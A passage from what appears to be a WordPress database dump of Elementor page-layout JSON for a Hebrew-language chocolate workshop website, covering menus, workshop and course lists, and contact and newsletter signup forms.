\\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(284,69,'_elementor_version','2.9.8'),(285,73,'_elementor_template_type','page'),(286,73,'_elementor_edit_mode','builder'),(287,74,'_elementor_template_type','page'),(288,74,'_elementor_edit_mode','builder'),(289,73,'_wp_page_template','default'),(290,73,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 